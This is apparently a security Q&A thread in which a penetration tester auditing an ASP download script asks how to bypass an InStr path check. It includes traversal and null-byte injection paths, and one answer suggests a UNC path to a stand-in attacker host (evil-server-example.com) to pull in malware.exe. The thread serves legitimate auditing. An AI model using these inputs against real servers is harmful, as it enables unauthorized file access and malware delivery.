4

I am auditing a possible vulnerable piece of ASP code on a Windows environment. The code is as follows:

If InStr(strPath, "\Only\Download\From\Here\", CompareMethod.Text) = 0 Then

Basicly it is supposed to only let the download script fetch files from that location. Webserver has directory traversal turned off. This means that the following submit will not work and will in fact return a 403 forbidden: 

\Only\Download\From\Here\..\..\..\..\..\c:\windows\system32\eula.txt

Because the function sais "InStr" instead of "BeginsWith" (psuedo code) it only checks if the String contains the path, but not in fact begins with the path.

The following submit will pass the If clause, but will return in a file not found:

c:\windows\system32\eula.txt%00\Only\Download\From\Here\

The nullbyte injected here does not do anything and it tries to find the file matching the entire string. I've also tried injecting CRLF, #, ; and more.

My question is then if there is any way I can submit a query string that would successfully download arbitrary files? Is there any way to submit a file URI that will fetch me a file and in a way commenting out the /Only/Download/From/Here.

Edit: To summarize I am looking for some kind of way to "comment" out the last part of the filename, either through a bug/feature/vulnerability in ASP, Webserver or windows's handling of files.

Ulkoma
  • 8,793
  • 16
  • 66
  • 95
Chris Dale
  • 16,149
  • 10
  • 57
  • 97
  • Unicode strings are terminated with double zero 0x0000 so you might want to try this. Windows is using unicode everywhere, and it's UTF-16, including .NET, but I dont think it could work this way but you can try. – Andrew Smith Jun 29 '12 at 09:43
  • So the question doesn't seem to be whether you can get past the InStr condition (because you can), but, rather once past that, can you do anything with the same string? Perhaps you need to show additional file-handling calls. – logicalscope Jun 29 '12 at 23:51
  • @logicalscope precisely. I can get past the InStr call, but currently I am locked to downloading only that folder and sub-folders. IIS prevents me from traversing up in the file structure. I am not sure what more code I can show that is relevant. ASP sends the file through Response.TransmitFile call. I will investigate the ASP libraries in more detail later, however it seems like for this audit the file is currently safe. – Chris Dale Jul 01 '12 at 11:10
  • I've also tried manipulating the filehandler with Alternating NTFS streams with no luck. – Chris Dale Jul 03 '12 at 07:13

2 Answers2

2

Whilst you probably can't get access to files on the system, it's still a potential vulnerability if you can get it to access UNC paths. You could get the server to download arbitrary files like so:

\\evil-server-example.com\Only\Download\From\Here\malware.exe

Just set up a server with Windows file sharing open to the internet, with an openly accessible share. This will cause the file to be downloaded, thought it may not be stored depending on the configuration of the OS and the code you're dealing with. If it is stored, it's likely to be in a temporary directory. You may be able to leverage this later on.

Polynomial
  • 133,763
  • 43
  • 302
  • 380
1

This cannot comment out \Only\Download\From\Here\ path in the actual ASP source code file unless there is different vulnerability that allows modifying the source code on the server.

Using CRLF, # etc is commenting out or ignoring the small piece of \Only\Download\From\Here\ in the actual ASP code file, which is almost impossible.

Every time a request is made, the web server will read the source code from ASP file and compile it. Your goal to download arbitrary files can be accomplished only if you inject a code loaded in the web servers memory for that specific request to ignore \Only\Download\From\Here\

EDIT: The only possible way to exploit this is to disguise the path as directory traversal does, but you don't have that option here. If any flaws in file path handling by web server or windows itself can allow this to happen then it will be a completely different vulnerability outside of this asp code.

Majoris
  • 890
  • 6
  • 12
  • Are you sure there is no trick you can play on the ASP Response.TransmitFile or Windows DLL's that work the file handling? – Chris Dale Jun 29 '12 at 10:28
  • I am sure that there is no way to `comment` out that path. When a ASP code is loaded, web server reads the asp file first complies it and then the machine code is executed. The only way to get to exploit this is to disguise the path as `directory traversal` does, but you don't have that option here. Right now I am not aware of anything that can provide what you are looking for. I can do more research to let you later. – Majoris Jun 29 '12 at 10:35
  • I've updated the last part of the question to reflect that I am also looking in feature/bug/vulnerabilties in how ASP, Webserver, Windows handles the file handling issues. If there is no way in breaking the filename string. – Chris Dale Jun 29 '12 at 12:32
  • Not this code, maybe there is something else, like sub-folders. – Andrew Smith Jun 29 '12 at 21:00